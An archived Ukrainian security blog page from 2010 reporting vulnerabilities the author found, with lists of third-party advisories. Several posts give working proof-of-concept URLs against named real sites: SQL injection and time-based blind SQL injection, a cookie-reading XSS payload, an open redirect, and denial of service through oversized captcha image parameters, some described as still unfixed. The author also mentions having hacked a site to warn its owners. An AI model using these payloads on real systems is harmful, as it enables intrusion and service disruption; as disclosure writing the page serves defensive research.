Архів для категорії 'Уразливості'

Уразливості на www.usdp.kiev.ua

19:15 03.04.2010

06.10.2009

У лютому, 07.02.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на http://www.usdp.kiev.ua - сайті політичної партії УСДП. Про що найближчим часом сповіщу адміністрацію сайта.

Зазначу, що я вже повідомляв власникам сайта про проблеми з його безпекою (шляхом ніжного хака сайта). Але вони й досі не виправили жодної уразливості на сайті, тим самим продовживши ігнорувати проблему безпеки власного ресурсу.

Детальна інформація про уразливості з’явиться пізніше.

03.04.2010

SQL Injection:

http://www.usdp.kiev.ua/?mid=-1%20or%20version()=5

http://www.usdp.kiev.ua/?mid=157&action=events_detail&id=-1%20or%20version()=5

Full path disclosure:

http://www.usdp.kiev.ua/?mid=-1

XSS:

http://www.usdp.kiev.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Але всіх проблем з безпекою сайта це не вирішило, бо на сайті все ще є дірки.

Уразливості в NovaBoard

23:55 02.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі NovaBoard. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/scripts/php/captcha/CaptchaSecurityImages.php?width=150&height=100

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше. Значення characters фіксоване.

DoS:

http://site/scripts/php/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі NovaBoard 1.1.2 та попередні версії.

Добірка уразливостей

15:38 02.04.2010

В даній добірці уразливості в веб додатках:

Уразливості в phpCOIN

23:51 01.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі phpCOIN. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі phpCOIN 1.6.5 та попередні версії.

Уразливості на bezpeka.com

19:14 01.04.2010

30.09.2009

У лютому, 06.02.2009, я знайшов SQL DB Structure Extraction, SQL Injection, Denial of Service та Redirector уразливості на секюріті сайті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на bezpeka.com.

Детальна інформація про уразливості з’явиться пізніше.

01.04.2010

Раніше сайт працював на домені bezpeka.com, а зараз лише на www.bezpeka.com.

SQL DB Structure Extraction:

http://www.bezpeka.com/ru/redirect/

http://www.bezpeka.com/ru/redirect/?bid=’

http://www.bezpeka.com/ru/redirect/?bcat=’

SQL Injection (сліпа):

http://www.bezpeka.com/ru/redirect/?bid=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)

DoS (через SQL Injection):

http://www.bezpeka.com/ru/redirect/?bid=1%20and%20benchmark(1000000,md5(now()))%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=1%20and%20benchmark(1000000,md5(now()))%23

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua

З даних уразливостей виправлені лише перша та третя SQL DB Structure Extraction та Redirector (і то неякісно). А всі інші уразливості досі не виправлені.

Остання уразливість знову працює при невеликій зміні URL запиту:

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua&bid=1&bcat=1

Уразливість в CB Captcha для Joomla і Mambo

23:56 31.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation уразливість в плагіні CB Captcha (plug_cbcaptcha) для компонента Community Builder (com_comprofiler) для Joomla і Mambo. Про що найближчим часом сповіщу розробників.

Даний плагін базується на скрипті капчі CaptchaSecurityImages.php і про уразливості в CaptchaSecurityImages я вже розповідав. І в плагіні plug_cbcaptcha виправлені всі Insufficient Anti-automation та Denial of Service уразливості з оригінального скрипта, окрім однієї.

Insufficient Anti-automation:

В плагіні можливий обхід капчі з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC. Використовуючи даний метод, можна обходити захист посилаючи один і той же код капчі.

Це може бути використано на всіх сторінках, де використовується даний плагін. Зокрема на сторінці реєстрації, формі втрати паролю та формі втрати емайлу.

Уразливі CB Captcha 1.0.2 та попередні версії, CB Captcha 2.2 та попередні версії.

Зазначу, що версії 1.x та 2.x зроблені різними авторами та мають чимало відмінностей. Зокрема в версії 2.x додана аудіо версія капчі, серед файлів плагіна зокрема з’явився captchaindex.php (який є головним скриптом плагіна, замість cb.captcha.php). Та окрім трьох вищезгаданий форм, капча також захищає контактну форму (при наявності компонента CB Contact 1.1) та форму логіна (при наявності модуля логіна CB 1.2).

Добірка уразливостей

15:35 31.03.2010

В даній добірці уразливості в веб додатках:

  • ToutVirtual VirtualIQ Multiple Vulnerabilities (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-003 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-002 (деталі)
  • Vulnerabilities in Oracle - Advisory #DSECRG-09-001 (деталі)
  • Oracle Updates for Multiple Vulnerabilities (деталі)
  • Multiple security issues in Cute News and UTF-8 Cute News (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • AssetsSoSimple supplier_admin.php Supplier Field XSS (деталі)

Уразливості в Dunia Soccer

23:51 30.03.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі Dunia Soccer. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/class/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/class/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії Dunia Soccer.

Нові уразливості в Mantis

23:54 29.03.2010

У вересні, 04.09.2009, я знайшов Brute Force та Insufficient Anti-automation уразливості в Mantis (MantisBT). Дані уразливості я виявив на zillya.com, де використовується даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Mantis.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

Добірка уразливостей

15:30 29.03.2010

В даній добірці уразливості в веб додатках:

  • New ejabberd packages fix cross-site scripting (деталі)
  • Bractus SunTrack Multiple XSS (деталі)
  • New TYPO3 packages fix several vulnerabilities (деталі)
  • eoCMS SQL injection vulnerability - Bkis Report (деталі)
  • Oracle TimesTen Remote Format String (деталі)
  • Oracle BEA WebLogic Server Apache Connector Buffer Overflow (деталі)
  • Oracle Secure Backup Multiple Denial Of Service vulnerabilities (деталі)
  • Oracle Secure Backup’s observiced.exe Denial Of Service vulnerability (деталі)
  • Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability (деталі)
  • Zervit Webserver Buffer Overflow (деталі)